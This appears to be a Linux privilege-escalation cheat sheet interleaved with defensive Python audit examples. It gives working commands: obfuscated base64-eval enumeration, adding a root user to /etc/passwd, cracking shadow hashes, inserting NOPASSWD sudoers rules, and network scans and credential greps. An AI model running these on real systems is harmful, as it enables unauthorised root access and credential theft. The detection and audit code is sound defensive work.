
Enumeration

Get the Distribution Codename
lsb_release -cs
One liners

You can build one-liners by chaining commands such as:

grep "sh$" /etc/passwd
env
sudo -l
hostname -I
uname -a
ifconfig
getcap -r / 2>/dev/null
find / -perm -4000 -or -perm -2000 2>/dev/null
(echo "###MARKER###_env"; env; echo "###MARKER###_sudo -l"; sudo -l; echo "###MARKER###_hostname -I"; hostname -I; echo "###MARKER###_ifconfig"; ifconfig; echo "###MARKER###_mount"; mount; echo "###MARKER###_uname -a"; uname -a; echo "###MARKER###_getcap"; timeout 10 getcap -r / 2>/dev/null; echo "###MARKER###_suid/guid"; timeout 10 find / -perm -4000 -or -perm -2000 2>/dev/null) | sed -n 's/^###MARKER###_\(.*\)$/=== \1 ===\n/p; t; p'
Stealthy version, splitting the payload across variables
a='ZWNobyAiJCRfZW52IjtlbnY7ZWNobyAiJCRfc3VkbyAtbCI7c3VkbyAtbDtlY2hvICIkX2hvc3RuYW1lIC1JIjtoc3RuYW1lIC1JO2VjaG8gIiRfaWZjb25maWciO2lmY29uZmlnO2VjaG8gIiRfbW91bnQiO21vdW50O2VjaG8gIiRfdW5hbWUgLWEiO3VuYW1lIC1hO2VjaG8gIiRfZ2V0Y2FwIjt0aW1lb3V0IDEwIGdldGNhcCAtciAvIDI+L2Rldi9udWxsO2VjaG8gIiRfZmluZCI7dGltZW91dCAxMCBmaW5kIC8gLXBlcm0gLTYwMDAgLW9yIC1wZXJtIC0yMDAwIDI+L2Rldi9udWxs'; b='c2VkIC1uICdzL15cJF9cKC4qXCkkLz09PSBcXDEgPT09L3A7IHQ7IHAn'; eval "$(echo $a | base64 -d)" | eval "$(echo $b | base64 -d)"
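From the defender's side, the two one-liner forms above (an inline `eval "$(echo … | base64 -d)"`, and the same thing with the base64 split into variables) are what a command-line audit trail should be watched for. The following is an added example, not code from the original page: it scans a constructed list of command lines of the kind collected from bash history or an auditd/EDR command-line feed, resolves simple same-line `name='value'` assignments so the split-variables form is caught too, and decodes the captured base64 so an analyst can see what would have run. The sample commands and the function names are assumptions made for the example.

```python
import base64
import binascii
import re

# Constructed sample of shell command lines as they might be collected from bash
# history or an auditd/EDR command-line feed. None of them come from the original page.
SAMPLE_COMMANDS = [
    'ls -la /var/log',
    'eval "$(echo ZWNobyBoZWxsbw== | base64 -d)"',
    "a='dW5hbWUgLWE='; eval \"$(echo $a | base64 -d)\"",
    'grep -iR "pass" * 2>/dev/null',
    'printf %s "Y2F0IC9ldGMvcGFzc3dk" | base64 --decode | bash -s',
]

B64 = r'([A-Za-z0-9+/=]{8,})'
# Form 1: eval "$(echo <b64> | base64 -d)"
_EVAL_RE = re.compile(
    r'eval\s+"?\$\((?:echo|printf\s+%s)\s+"?' + B64
    + r'"?\s*\|\s*base64\s+(?:-d|--decode)')
# Form 2: echo <b64> | base64 -d | sh
_PIPE_RE = re.compile(
    r'(?:echo|printf\s+%s)\s+"?' + B64
    + r'"?\s*\|\s*base64\s+(?:-d|--decode)\s*\|\s*(?:sh|bash|dash|zsh)\b')
# Simple name='value' assignments, so the split-variables form can be resolved
# before matching. The lookbehind keeps --flag=value out of the variable table.
_ASSIGN_RE = re.compile(r"(?<![\w-])([A-Za-z_]\w*)=(?:'([^']*)'|\"([^\"]*)\"|(\S+))")
_VAR_RE = re.compile(r'\$\{?([A-Za-z_]\w*)\}?')


def resolve_vars(cmd):
    """Inline same-line variable assignments so $name becomes the literal it holds."""
    values = {}
    for m in _ASSIGN_RE.finditer(cmd):
        values[m.group(1)] = m.group(2) or m.group(3) or m.group(4) or ''
    return _VAR_RE.sub(lambda m: values.get(m.group(1), m.group(0)), cmd)


def decode_preview(blob):
    """Decode the captured base64 for analyst triage; None if it is not valid base64/UTF-8."""
    try:
        return base64.b64decode(blob, validate=True).decode('utf-8')
    except (binascii.Error, UnicodeDecodeError, ValueError):
        return None


def find_obfuscated_execs(commands):
    """Return (original command, decoded payload) for each command that feeds
    base64-decoded text into eval or a shell."""
    hits = []
    for cmd in commands:
        resolved = resolve_vars(cmd)
        m = _EVAL_RE.search(resolved) or _PIPE_RE.search(resolved)
        if m:
            hits.append((cmd, decode_preview(m.group(1))))
    return hits


if __name__ == '__main__':
    for cmd, payload in find_obfuscated_execs(SAMPLE_COMMANDS):
        print('%-60s -> %r' % (cmd[:60], payload))
```

The variable resolution only handles assignments on the same command line; a value set in an earlier history entry has to be joined by the collector before this check runs.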
Check Groups
cat /etc/group
Check Ownership by group
find / -group management 2>/dev/null

Members of the adm group can read log files.

ls -la /var/log
Look for files owned by this group
find / -group adm 2>/dev/null
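Group membership is the mirror image of the checks above: on the hardening side, the question is who sits in groups that amount to a privilege grant (adm for logs, sudo/wheel for root, docker/lxd/disk for daemon or device access, shadow for the hash file). The following is an added example, not code from the original page: it parses a constructed /etc/group excerpt and reports members of privileged groups that are not on an allow-list. The sample content, the group list and the function names are assumptions made for the example.

```python
# Constructed /etc/group excerpt (not from the original page).
SAMPLE_GROUP = """\
root:x:0:
adm:x:4:syslog,alice
sudo:x:27:alice,bob
docker:x:998:carol
lxd:x:120:
shadow:x:42:backup
management:x:1005:dave
"""

# Membership in these groups is in practice a privilege grant: adm reads logs,
# sudo/wheel run commands as root, docker/lxd/disk reach root through their
# daemons or raw devices, shadow reads the password hashes.
PRIVILEGED_GROUPS = {'root', 'adm', 'sudo', 'wheel', 'docker', 'lxd', 'disk', 'shadow'}


def parse_group(text):
    """Parse /etc/group text into {group: (gid, [members])}; malformed lines are skipped."""
    groups = {}
    for line in text.splitlines():
        if not line or line.startswith('#'):
            continue
        parts = line.split(':')
        if len(parts) != 4 or not parts[2].isdigit():
            continue
        name, _password, gid, members = parts
        groups[name] = (int(gid), [m for m in members.split(',') if m])
    return groups


def privileged_members(text, allowed=None):
    """Return {group: sorted members} for every privileged group that has members
    outside the allow-list (e.g. {'adm': {'syslog'}} for the log daemon account)."""
    allowed = allowed or {}
    findings = {}
    for name, (_gid, members) in parse_group(text).items():
        if name not in PRIVILEGED_GROUPS:
            continue
        unexpected = sorted(m for m in members if m not in allowed.get(name, set()))
        if unexpected:
            findings[name] = unexpected
    return findings


if __name__ == '__main__':
    for group, members in privileged_members(SAMPLE_GROUP, {'adm': {'syslog'}}).items():
        print('%-8s %s' % (group, ', '.join(members)))
```

Only supplementary membership is covered; a user whose primary GID in /etc/passwd is a privileged group does not appear in the member column and needs a passwd-side check.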
Check processes and Services
ps auxww
Read crontab file
cat /etc/crontab
Container processes
ps auxww | grep docker
ps auxww | grep lxd
Check Services running
ls /etc/init.d

If /proc is mounted with the hidepid option set to 2 (invisible), each user can see only their own processes; only root sees all of them. Check the mount options:

mount | grep "/proc "
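The grep above shows the raw line; the following is an added example, not code from the original page, that parses `mount` output and reports the effective hidepid setting for /proc, including the case where the option is absent (equivalent to 0) and the case where /proc is not mounted at all. The sample output and the function names are assumptions made for the example.

```python
import re

# Constructed `mount` output (not from the original page).
SAMPLE_MOUNT = """\
sysfs on /sys type sysfs (rw,nosuid,nodev,noexec,relatime)
proc on /proc type proc (rw,nosuid,nodev,noexec,relatime,hidepid=2,gid=15)
udev on /dev type devtmpfs (rw,nosuid,relatime,size=1998396k,nr_inodes=499599,mode=755)
"""

_MOUNT_RE = re.compile(
    r'^(?P<src>\S+) on (?P<target>\S+) type (?P<fstype>\S+) \((?P<opts>[^)]*)\)$')


def parse_mounts(text):
    """Return {mount point: {option: value-or-None}} from `mount` output; unparseable lines are skipped."""
    mounts = {}
    for line in text.splitlines():
        m = _MOUNT_RE.match(line.strip())
        if not m:
            continue
        opts = {}
        for opt in m.group('opts').split(','):
            key, _, value = opt.partition('=')
            opts[key] = value or None          # flag options such as rw/nosuid carry no value
        mounts[m.group('target')] = opts
    return mounts


def proc_hidepid(text):
    """hidepid value for /proc: '0' when mounted without the option, None when /proc is not mounted."""
    opts = parse_mounts(text).get('/proc')
    if opts is None:
        return None
    return opts.get('hidepid') or '0'


def proc_restricts_other_users(text):
    """True when hidepid is 1/noaccess, 2/invisible or 4/ptraceable, i.e. other users'
    processes are hidden or unreadable for unprivileged users."""
    return proc_hidepid(text) in {'1', 'noaccess', '2', 'invisible', '4', 'ptraceable'}


if __name__ == '__main__':
    print('hidepid on /proc:', proc_hidepid(SAMPLE_MOUNT))
```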
Check Listening ports
Show listening ports
netstat -tuln
netstat -tnl
Show all TCP sockets, including localhost listeners (BSD/macOS netstat syntax)
netstat -an -p tcp
/etc/passwd

Write Permissions

Generate the password hash
openssl passwd -1 tokyo
Add the line
echo 'tokyo:$1$iLayOiAd$8dHGiU.Qvk/uqjnoWzRpm/:0:0:tokyo:/root:/bin/bash' >> passwd
/etc/shadow

Crack the hash

Create the Hash file
echo 'zoe:$y$j9T$Ct0y5TNQ/sv95CFPz510O/$7YtCDOBISfngZeQ3rsDkRcw2XTFDgHBkxDpuhyBLNO1:1002:1002:zoe:/home/zoe:/bin/bash' > shadowHash.txt
With John
john --wordlist=~/Documents/Wordlists/rockyou.txt shadowHash.txt --format=crypt
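Both of the preceding sections (a writable /etc/passwd, and hashes in /etc/shadow that are cheap to crack) have a straightforward audit counterpart. The following is an added example, not code from the original page: it parses constructed /etc/passwd and /etc/shadow excerpts and flags the conditions those sections exploit, namely a second UID-0 account, a hash stored directly in the passwd password field, duplicate UIDs, empty password fields, and legacy hash algorithms such as MD5-crypt (the `$1$` prefix that `openssl passwd -1` produces) versus yescrypt (`$y$`). The sample entries use placeholder hash bodies and the function names are assumptions made for the example.

```python
# Constructed /etc/passwd and /etc/shadow excerpts with placeholder hashes
# (not from the original page; the hash bodies are not real digests).
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
zoe:x:1002:1002:zoe:/home/zoe:/bin/bash
tokyo:$1$saltsalt$PLACEHOLDER_MD5CRYPT_HASH:0:0:tokyo:/root:/bin/bash
"""
SAMPLE_SHADOW = """\
root:$y$j9T$saltsaltsaltsalt$PLACEHOLDER_YESCRYPT_HASH:19700:0:99999:7:::
daemon:*:19700:0:99999:7:::
zoe:$6$saltsalt$PLACEHOLDER_SHA512CRYPT_HASH:19700:0:99999:7:::
legacy:$1$saltsalt$PLACEHOLDER_MD5CRYPT_HASH:19700:0:99999:7:::
guest::19700:0:99999:7:::
"""

# crypt(3) prefixes -> algorithm. Anything else starting with '$' is reported as unknown.
HASH_ALGORITHMS = {
    '1': 'md5crypt', '2a': 'bcrypt', '2b': 'bcrypt', '2y': 'bcrypt',
    '5': 'sha256crypt', '6': 'sha512crypt', '7': 'scrypt',
    'y': 'yescrypt', 'gy': 'gost-yescrypt',
}
WEAK_ALGORITHMS = {'descrypt', 'md5crypt'}


def classify_hash(field):
    """Label a password field: empty, locked, in-shadow ('x'), an algorithm name, or unknown."""
    if field == '':
        return 'empty'
    if field[0] in '!*':
        return 'locked'
    if field == 'x':
        return 'in-shadow'
    if field.startswith('$'):
        return HASH_ALGORITHMS.get(field.split('$')[1], 'unknown')
    if len(field) == 13:          # traditional DES crypt: 2 salt chars + 11 hash chars
        return 'descrypt'
    return 'unknown'


def audit_passwd(text):
    """Flag extra UID-0 accounts, hashes stored directly in passwd, and duplicate UIDs."""
    findings = []
    by_uid = {}
    for line in text.splitlines():
        parts = line.split(':')
        if len(parts) != 7:
            continue
        name, pw, uid = parts[0], parts[1], parts[2]
        if uid == '0' and name != 'root':
            findings.append((name, 'uid 0 account other than root'))
        if pw != 'x':
            findings.append((name, 'password field set in passwd (%s)' % classify_hash(pw)))
        by_uid.setdefault(uid, []).append(name)
    for uid, names in by_uid.items():
        if len(names) > 1:
            findings.append((','.join(names), 'duplicate uid %s' % uid))
    return findings


def audit_shadow(text):
    """Flag accounts with an empty password field or a weak (cheaply crackable) hash algorithm."""
    findings = []
    for line in text.splitlines():
        parts = line.split(':')
        if len(parts) != 9:
            continue
        name, label = parts[0], classify_hash(parts[1])
        if label == 'empty':
            findings.append((name, 'empty password'))
        elif label in WEAK_ALGORITHMS:
            findings.append((name, 'weak hash algorithm %s' % label))
    return findings


if __name__ == '__main__':
    for who, issue in audit_passwd(SAMPLE_PASSWD) + audit_shadow(SAMPLE_SHADOW):
        print('%-12s %s' % (who, issue))
```

Run against the real files this needs root (shadow is mode 0640 root:shadow), which is exactly the property the audit is meant to confirm.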
/etc/sudoers
Try to read it
cat /etc/sudoers
  • If the file is read-only, you need to change its permissions to allow write access:

chmod +w /etc/sudoers
  • Add the following line:

yourUser   ALL=(ALL) NOPASSWD: ALL
  • Restore the original file permissions to make it read-only again:

chmod 440 /etc/sudoers
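The line added above (`ALL=(ALL) NOPASSWD: ALL`) is what a sudoers review should catch, and the mode reset is what `visudo` would have enforced. The following is an added example, not code from the original page: it parses a constructed sudoers file into user/group specifications, tracking that a `NOPASSWD:` tag applies to the commands that follow it, reports every principal allowed to run `ALL` as root without a password, and checks that a stat mode matches the expected 0440. The sample content and the function names are assumptions made for the example; alias expansion and `@includedir` recursion are out of scope.

```python
import re

# Constructed /etc/sudoers content (not from the original page).
SAMPLE_SUDOERS = """\
# User privilege specification
Defaults        env_reset
root    ALL=(ALL:ALL) ALL
%admin  ALL=(ALL) ALL
%sudo   ALL=(ALL:ALL) ALL
deploy  ALL=(ALL) NOPASSWD: /usr/bin/systemctl restart app
yourUser   ALL=(ALL) NOPASSWD: ALL
@includedir /etc/sudoers.d
"""

# user_or_%group  hosts = (runas_user[:runas_group]) [TAG:] command, [TAG:] command ...
_RULE_RE = re.compile(
    r'^(?P<who>\S+)\s+(?P<hosts>\S+)\s*=\s*(?:\((?P<runas>[^)]*)\)\s*)?(?P<spec>.+)$')
_SKIP_PREFIXES = ('Defaults', 'User_Alias', 'Runas_Alias', 'Host_Alias', 'Cmnd_Alias')


def parse_sudoers(text):
    """Return [(who, runas_user, [(nopasswd, command), ...])] for each user/group specification.
    Comments, Defaults, alias definitions and @include/#include directives are skipped.
    runas_user is '' when the rule names only a run-as group (the invoking user is kept)."""
    rules = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in '#@' or line.startswith(_SKIP_PREFIXES):
            continue
        m = _RULE_RE.match(line)
        if not m:
            continue
        runas_user = (m.group('runas') or 'root').split(':')[0]
        nopasswd = False                      # a tag applies to the commands that follow it
        commands = []
        for cmd in m.group('spec').split(','):
            cmd = cmd.strip()
            while ':' in cmd and cmd.split(':', 1)[0].isupper():
                tag, cmd = (s.strip() for s in cmd.split(':', 1))
                if tag == 'NOPASSWD':
                    nopasswd = True
                elif tag == 'PASSWD':
                    nopasswd = False
            commands.append((nopasswd, cmd))
        rules.append((m.group('who'), runas_user, commands))
    return rules


def passwordless_root(text):
    """Principals (users or %groups) allowed to run ALL commands as root without a password."""
    hits = []
    for who, runas_user, commands in parse_sudoers(text):
        if runas_user in ('ALL', 'root') and any(nopw and cmd == 'ALL' for nopw, cmd in commands):
            hits.append(who)
    return hits


def sudoers_mode_ok(st_mode):
    """sudo expects /etc/sudoers to be root-owned and mode 0440; pass os.stat(path).st_mode."""
    return (st_mode & 0o7777) == 0o440


if __name__ == '__main__':
    print('passwordless root:', passwordless_root(SAMPLE_SUDOERS))
```

A `NOPASSWD:` on a single, fully qualified command (the `deploy` rule in the sample) is not reported; the check is aimed at blanket grants, which is the pattern the sudoers section above inserts.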
Scan the local network
  • Find out how many hosts there are in the network by doing a ping sweep:

for i in {1..254}; do (ping -c 1 192.168.0.${i} | grep "bytes from" | grep -v "Unreachable" &); done;
  • If nc is installed, it can be used to scan for open ports:

nc -zv 192.168.0.1 1-65535 2>&1 | grep -v refused | tee scan
UDP scan
nc -uzv 192.168.0.1 1-65535 2>&1 | grep -v refused

Credential Hunting

Passwords

  • Search for the string pass (case-insensitive) in all files and directories recursively:

grep -iR "pass" * 2>/dev/null
  • Search for the string password in dotfiles whose names contain a second dot (the .*.* glob), recursively:

grep password .*.* -r 2>/dev/null
  • Search for ssh keys recursively from the current directory you are in:

grep -iR -E "(ssh-(rsa|ed25519|dss|ecdsa|rsa1)[ ]+[A-Za-z0-9+/=]+|-----BEGIN [A-Z ]+PRIVATE KEY-----)" * 2>/dev/null

Hashes

MD5 hashes (word-bounded, so longer digests are not also reported as MD5)
grep -aPo '\b[a-fA-F0-9]{32}\b' /DESIRED/PATH
SHA-1
grep -aPo '\b[a-fA-F0-9]{40}\b' /DESIRED/PATH
SHA-256
grep -aPo '\b[a-fA-F0-9]{64}\b' /DESIRED/PATH
SHA-512
grep -aPo '\b[a-fA-F0-9]{128}\b' /DESIRED/PATH
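The same patterns serve as a secret scanner run over repositories and configuration before they ship. The following is an added example, not code from the original page: it generalises the four hash greps above into one length-classifying match, shows why the word boundaries matter (an unbounded 32-hex pattern reports every SHA-256 twice), and applies the same ssh-key/PEM-header expression as the Passwords section to the same text. The sample text is constructed; its two digests are the well-known test vectors MD5("password") and SHA-256("hello"), and the function names are assumptions made for the example.

```python
import re

# Constructed file content mixing hashes and key material (not from the original page).
# The two digests are well-known test vectors (MD5 of "password", SHA-256 of "hello").
SAMPLE_TEXT = """\
db_pass_md5 = 5f4dcc3b5aa765d61d8327deb882cf99
release_sha256 = 2cf24dba5fb0a30e26e83b2ac5b9e29e1b161e5c1fa7425e73043362938b9824
build_id = deadbeef
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAICONSTRUCTEDEXAMPLEKEYMATERIALxxxxxxxxxxxx ops@host
-----BEGIN OPENSSH PRIVATE KEY-----
"""

HASH_LENGTHS = {32: 'MD5', 40: 'SHA-1', 64: 'SHA-256', 128: 'SHA-512'}
# Longest alternative first and \b on both sides: without the boundaries a 64-hex
# SHA-256 also yields two 32-hex "MD5" matches.
_BOUNDED_HEX_RE = re.compile(
    r'\b(?:[a-fA-F0-9]{128}|[a-fA-F0-9]{64}|[a-fA-F0-9]{40}|[a-fA-F0-9]{32})\b')
_UNBOUNDED_MD5_RE = re.compile(r'[a-fA-F0-9]{32}')
# Same shape as the ssh-key grep: OpenSSH public keys and PEM private-key headers.
_KEY_RE = re.compile(
    r'ssh-(?:rsa|ed25519|dss|ecdsa)[ ]+[A-Za-z0-9+/=]+|-----BEGIN [A-Z ]+PRIVATE KEY-----')


def find_hashes(text):
    """Return (algorithm label, hex digest) for every whole-token hex run of a known digest length."""
    return [(HASH_LENGTHS[len(m)], m) for m in _BOUNDED_HEX_RE.findall(text)]


def count_md5_candidates(text, bounded=True):
    """Count 32-hex matches with or without word boundaries, to show the false-positive gap."""
    pattern = _BOUNDED_HEX_RE if bounded else _UNBOUNDED_MD5_RE
    return sum(1 for m in pattern.findall(text) if len(m) == 32)


def find_key_material(text):
    """Return OpenSSH public-key entries and PEM private-key headers found in text."""
    return _KEY_RE.findall(text)


if __name__ == '__main__':
    for label, digest in find_hashes(SAMPLE_TEXT):
        print('%-8s %s' % (label, digest))
    for item in find_key_material(SAMPLE_TEXT):
        print('key      %s' % item[:50])
```

Length alone cannot tell an MD5 from another 128-bit hex value such as a UUID without dashes or a random token, so hits are candidates for review, not confirmed credentials.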
